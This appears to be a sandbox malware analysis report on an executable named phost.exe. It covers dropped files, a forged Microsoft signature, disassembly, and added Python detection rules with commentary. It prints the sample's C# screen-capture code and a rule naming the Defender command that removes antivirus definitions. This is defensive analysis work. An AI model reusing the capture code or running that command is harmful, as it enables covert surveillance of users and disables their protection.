                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.095915071224832
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryLYak7YnqqGNPN5Dlq5J:+RI+ycuZhNpYakSGNPNnqX
MD5:39C59C69AAA5EED127843D1E5F5B7D9A
SHA1:52D6A767476F0994F9F8BF4E9083A9A7A3169044
SHA-256:6F83F96A3151C087C37A335F31A26F16C7C1E583412B29059D46071A5A669C78
SHA-512:193D61CF36896B599A1E0DF6D40A3592ACB1FAA2CBCA3380394E442D63C1A405892CFF8B352D16610264D958BC09D8AA0C8ED2C2C16ABA20ED35313888C6CF7D
Malicious:false
Reputation:unknown
Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.n.x.i.p.h.g.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.n.x.i.p.h.g.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):1004
Entropy (8bit):4.154581034278981
Encrypted:false
SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:C76055A0388B713A1EABE16130684DC3
SHA1:EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:false
Reputation:unknown
Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
Category:dropped
Size (bytes):607
Entropy (8bit):5.363038818064354
Encrypted:false
SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfFyWZEifF59:V3ka6KOkqeFkOfREifX9
MD5:E53A72B0EFC65095CF1988DA01F172E2
SHA1:2DEB23484235D18D21DBC5E1398C9847594D0F54
SHA-256:C6426350E1FC5BFBB2186D57F4F19D338996D1670E4A750DBF996B76BD3D2306
SHA-512:86E1273E22427A0452FBB277B92DC500FB16EF17839FF88302132BF7F3E5965A11030FB0E34C5ED54E6FFA58D5B3ABC35158758BD2678BAE48BB085B7DB583EE
Malicious:true
Reputation:unknown
Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.0.cs"
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):4096
Entropy (8bit):3.157522076694003
Encrypted:false
SSDEEP:48:6h7oEAtf0KhzBU/2f6mtJFN0npW1ulia32q:7Nz0pmdOnEK
MD5:D1F54FB254363100063A1E6E9805257C
SHA1:72DA27B8496544A77611315787267880C71A877A
SHA-256:D55B50C929F43AC85CBCD923FBDCBA614F40B61027584D440C393D884A2D1880
SHA-512:94544A68FE47C86DC5F04E40B18F49F45CEE0E5829AB12D39D4F34CF0EA1A370DE3844F9D5B3545E05318D3B1B6C3A9F5DB51CE2D2A48A7139B264477FED19B8
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
Category:modified
Size (bytes):1148
Entropy (8bit):5.504656764168761
Encrypted:false
SSDEEP:24:KJfTId3ka6KOkqeFkOfREifX4Kax5DqBVKVrdFAMBJTH:uTkka6NkqeFkyREuX4K2DcVKdBJj
MD5:45F3B588A431D010F9D266622E121793
SHA1:5DF1C6D56C8804838395DBD594EF386C88D08C1C
SHA-256:1C44FDB5CBE0E88CE11C058619F8709A4AEAD1E8350094FC7F307B8FADB4237A
SHA-512:2ECA98EEC9B39B5E1A76A91C72466175EDAF1D55460FD4ABDDAAE14D353C911454A466BF7F8EADB28FECFB979CB2C5AD70818977B8058FCB99406D6465E7A856
Malicious:false
Reputation:unknown
Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer
Process:C:\Windows\System32\svchost.exe
File Type:JSON data
Category:dropped
Size (bytes):55
Entropy (8bit):4.306461250274409
Encrypted:false
SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:DCA83F08D448911A14C22EBCACC5AD57
SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):97
                                                                                                                                                                                                                            Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                            MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                            SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                            SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                            SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
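Two of the dropped files above are worth reading as detection material rather than as file metadata. The csc.exe command line captured in the compiler-output preview (a random eight-character directory under %TEMP%, a `.0.cs` source file, `/R:` references that include System.Management.Automation.dll, `/out:` pointing back into the same Temp directory) is exactly what PowerShell's Add-Type produces when it compiles inline C# through CodeDom, and the MpCmdRun.exe output "No engine/signature is currently loaded" is what Defender reports once its definitions have been removed. The following Python is an added example, not part of the Joe Sandbox report or of its tooling: it runs two process-creation rules over constructed events modelled on those artifacts. Event 0 reuses the csc.exe command line from the preview; the `-RemoveDefinitions -All` invocation in event 2, all parent processes, and the two benign control events are assumptions made for the example.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (not telemetry from the report). Event 0 reuses the
# csc.exe command line shown in the dropped-file preview; event 2 is the assumed MpCmdRun.exe
# invocation behind "No engine/signature is currently loaded"; events 1 and 3 are benign controls.
EVENTS = [
    {
        "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
        "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": (
            r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output '
            r'/R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation'
            r'\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" '
            r'/out:"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.dll" /debug- /optimize+ '
            r'"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.0.cs"'
        ),
    },
    {
        "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
        "parent": r"C:\Program Files (x86)\MSBuild\14.0\Bin\MSBuild.exe",
        "cmdline": r'csc.exe /t:library /out:"C:\build\app\bin\Release\app.dll" C:\build\app\Program.cs',
    },
    {
        "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
        "parent": r"C:\Windows\System32\cmd.exe",
        "cmdline": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    },
    {
        "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
        "parent": r"C:\Windows\System32\svchost.exe",
        "cmdline": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -SignatureUpdate',
    },
]

# Locations an unprivileged user (or a PowerShell script running as one) can write to.
USER_WRITABLE = re.compile(
    r"\\(?:Users\\[^\\]+\\AppData\\(?:Local|Roaming)|Users\\Public|ProgramData|Windows\\Temp)\\",
    re.IGNORECASE,
)
OUT_ARG = re.compile(r'/out:"?([^"\s]+)', re.IGNORECASE)
POWERSHELL_ASSEMBLY = re.compile(r"System\.Management\.Automation\.dll", re.IGNORECASE)


def image_name(path: str) -> str:
    """Case-folded basename of an image path, so rules do not depend on install location."""
    return PureWindowsPath(path).name.lower()


def detect(events: list) -> list:
    """Return (rule, event_index, detail) for every event that matches one of the two rules."""
    hits = []
    for i, ev in enumerate(events):
        name, cmd = image_name(ev["image"]), ev["cmdline"]
        if name == "csc.exe":
            # Rule 1: the C# compiler writing its output into a user-writable directory.
            m = OUT_ARG.search(cmd)
            out = m.group(1) if m else ""
            if USER_WRITABLE.search(out):
                detail = "output %s" % out
                # Referencing the PowerShell engine assembly, or a PowerShell parent, marks Add-Type.
                if POWERSHELL_ASSEMBLY.search(cmd) or image_name(ev["parent"]) == "powershell.exe":
                    detail += "; Add-Type style compile"
                hits.append(("csc_compile_to_user_writable_dir", i, detail))
        elif name == "mpcmdrun.exe" and re.search(r"-RemoveDefinitions\b", cmd, re.IGNORECASE):
            # Rule 2: Defender's own command-line tool used to unload its signature set.
            hits.append(("defender_definitions_removed", i, cmd.split(".exe", 1)[-1].strip(' "')))
    return hits


if __name__ == "__main__":
    for rule, idx, detail in detect(EVENTS):
        print(rule, idx, detail)
```

Rule 1 fires on legitimate administrative scripts that use Add-Type as well, so in production it needs tuning on parent process, user and the compiled source's location; rule 2 has very few benign triggers and can be alerted on directly.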
                                                                                                                                                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Entropy (8bit):7.993007862257056
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                            File name:phost.exe
                                                                                                                                                                                                                            File size:7'832'204 bytes
                                                                                                                                                                                                                            MD5:8c43bf4445cac5fa025b9dfd07517b6f
                                                                                                                                                                                                                            SHA1:b7e9e405e3867213cd3e544574ceff70bef2b6fb
                                                                                                                                                                                                                            SHA256:dcf517b48094726367f1fdb2ace3f2cfd29f4f9710512f45ecb0109d03cc0dcc
                                                                                                                                                                                                                            SHA512:95097a7d6cbd1bf6ef197a740d70f98ba5dfd8081c3bee0f9f8e3bd100df36a949d5caa770c918f01f4c1d78227ba355026a3774ca2b06329fe6bc5bba00a8a3
                                                                                                                                                                                                                            SSDEEP:196608:oPvLjv+bhqNVoBLD7fEXEoYbiIv9pvvk9fIiZ1jA:ajL+9qz8LD7fEUbiIqQgpA
                                                                                                                                                                                                                            TLSH:BF863358A3A80DF1EE76503DD766DC4ADB36B8022710C9CF17A563266E27CC5843BBB1
                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..
                                                                                                                                                                                                                            Icon Hash:212303032313271a
                                                                                                                                                                                                                            Entrypoint:0x14000ce20
                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                            Time Stamp:0x6755D914 [Sun Dec 8 17:36:20 2024 UTC]
                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                            Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
                                                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                                                            Signature Issuer:CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232 (0x80096010, TRUST_E_BAD_DIGEST: the hash in the signed data does not match the file)
                                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                                            • 27/03/2019 19:21:25 27/03/2020 19:21:25
                                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                                            • CN=Microsoft Windows Publisher, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                                            Thumbprint MD5:AA1D28E8A5D68A49858575128FE50CF2
                                                                                                                                                                                                                            Thumbprint SHA-1:995C912805748FCA8F583E1506E1EC651CB24877
                                                                                                                                                                                                                            Thumbprint SHA-256:EE4E8D1212CAEC402EA6EE8C2CD33B6856BE8CB51D5D70D3468BAB51E529F7EA
                                                                                                                                                                                                                            Serial:33000002176A92089823FB0577000000000217
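The signature block above describes a file that carries an Authenticode blob chaining to Microsoft Windows Production PCA 2011 but whose signature does not verify: error -2146869232 is 0x80096010, TRUST_E_BAD_DIGEST, meaning the digest inside the signed data is not the digest of this file. The certificate's validity window (27/03/2019 to 27/03/2020) also closes more than four years before the COFF timestamp (0x6755D914, Sun Dec 8 2024). Together these are what a signature block lifted from a genuine Microsoft binary and appended to another file looks like. The following Python is an added example, not part of the report or of any tool it uses: it pulls the COFF timestamp and the security data directory out of a PE header with the standard library only and applies those two checks. The PE image it parses is a constructed header-only file carrying the report's timestamp; the security directory offset and size, and the assumption that the certificate times are UTC, are invented for the example.

```python
import struct
from datetime import datetime, timezone

IMAGE_DIRECTORY_ENTRY_SECURITY = 4  # the Authenticode blob is data directory 4


def pe_signing_info(data: bytes) -> dict:
    """Return the COFF timestamp and the security data directory of a PE32 or PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, _, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dirs = opt + (112 if magic == 0x20B else 96)  # data directories start later in PE32+
    if dirs + 8 * (IMAGE_DIRECTORY_ENTRY_SECURITY + 1) > opt + opt_size:
        raise ValueError("optional header too short for a security directory")
    sec_off, sec_size = struct.unpack_from("<II", data, dirs + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    return {
        "machine": machine,
        "pe32plus": magic == 0x20B,
        "timestamp": timestamp,
        "compiled": datetime.fromtimestamp(timestamp, tz=timezone.utc),
        "security_offset": sec_off,  # a file offset, not an RVA, for this directory
        "security_size": sec_size,
    }


def assess(info: dict, cert_not_before: datetime, cert_not_after: datetime, signature_verifies: bool) -> list:
    """Combine the parsed header with the verifier's verdict into triage findings."""
    if info["security_size"] == 0:
        return ["no Authenticode blob"]
    findings = ["Authenticode blob present"]
    if not signature_verifies:
        findings.append("signature does not verify: digest in signed data does not match the file")
    if not (cert_not_before <= info["compiled"] <= cert_not_after):
        findings.append("COFF timestamp outside signer certificate validity")
    return findings


def build_minimal_pe(timestamp: int, sec_off: int, sec_size: int, pe32plus: bool = True) -> bytes:
    """Constructed header-only PE image for the example; not derived from phost.exe's bytes."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 240 if pe32plus else 224
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, timestamp, 0, 0, opt_size, 0x0022)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    dirs = 112 if pe32plus else 96
    struct.pack_into("<II", opt, dirs + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, sec_off, sec_size)
    return dos + b"PE\0\0" + coff + bytes(opt)


# From the report: COFF timestamp 0x6755D914 and the signer certificate's validity window.
# Assumptions: the certificate times are UTC; the security directory offset and size are invented.
SAMPLE = build_minimal_pe(0x6755D914, sec_off=0x770000, sec_size=0x2100)
CERT_NOT_BEFORE = datetime(2019, 3, 27, 19, 21, 25, tzinfo=timezone.utc)
CERT_NOT_AFTER = datetime(2020, 3, 27, 19, 21, 25, tzinfo=timezone.utc)

if __name__ == "__main__":
    info = pe_signing_info(SAMPLE)
    print("compiled:", info["compiled"].isoformat())
    for finding in assess(info, CERT_NOT_BEFORE, CERT_NOT_AFTER, signature_verifies=False):
        print("-", finding)
```

Two caveats apply to the timestamp check. The COFF timestamp is attacker-controlled, and toolchains with reproducible-build options write a content hash or zero there instead of a time; and a signature countersigned with a trusted timestamp stays valid after the signing certificate expires, so an expired certificate alone proves nothing. The comparison is a supporting indicator only; the decisive signal is the digest mismatch, which on a live Windows host is what `Get-AuthenticodeSignature` reports as Status HashMismatch.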
                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            call 00007FC204FFC2ACh
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            jmp 00007FC204FFBECFh
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            call 00007FC204FFC678h
                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                            je 00007FC204FFC073h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                            jmp 00007FC204FFC057h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            cmp ecx, eax
                                                                                                                                                                                                                            je 00007FC204FFC066h
                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            cmpxchg dword ptr [0003570Ch], ecx
                                                                                                                                                                                                                            jne 00007FC204FFC040h
                                                                                                                                                                                                                            xor al, al
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            ret
mov al, 01h
jmp 00007FC204FFC049h
int3
int3
int3
sub rsp, 28h                          ; REX.W prefix, shown as a separate "dec eax" by the 32-bit decode
test ecx, ecx
jne 00007FC204FFC059h
mov byte ptr [000356F5h], 00000001h
call 00007FC204FFB7A5h
call 00007FC204FFCA90h
test al, al
jne 00007FC204FFC056h
xor al, al
jmp 00007FC204FFC066h
call 00007FC2050095AFh
test al, al
jne 00007FC204FFC05Bh
xor ecx, ecx
call 00007FC204FFCAA0h
jmp 00007FC204FFC03Ch
mov al, 01h
add rsp, 28h                          ; REX.W prefix, shown as "dec eax"
ret
int3
int3
push rbx                              ; 40h REX prefix, shown as "inc eax"
sub rsp, 20h                          ; REX.W prefix, shown as "dec eax"
cmp byte ptr [000356BCh], 00000000h
mov ebx, ecx
jne 00007FC204FFC0B9h
cmp ecx, 01h
jnbe 00007FC204FFC0BCh
call 00007FC204FFC5EEh
test eax, eax
je 00007FC204FFC07Ah
test ebx, ebx
jne 00007FC204FFC076h
lea rcx, qword ptr [000356A6h]        ; REX.W prefix, shown as "dec eax"; RIP-relative address
call 00007FC2050093A2h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3ca34 | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x47000 | 0x327c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x44000 | 0x2238 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x775c5c | 0x2630 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4b000 | 0x764 | .reloc
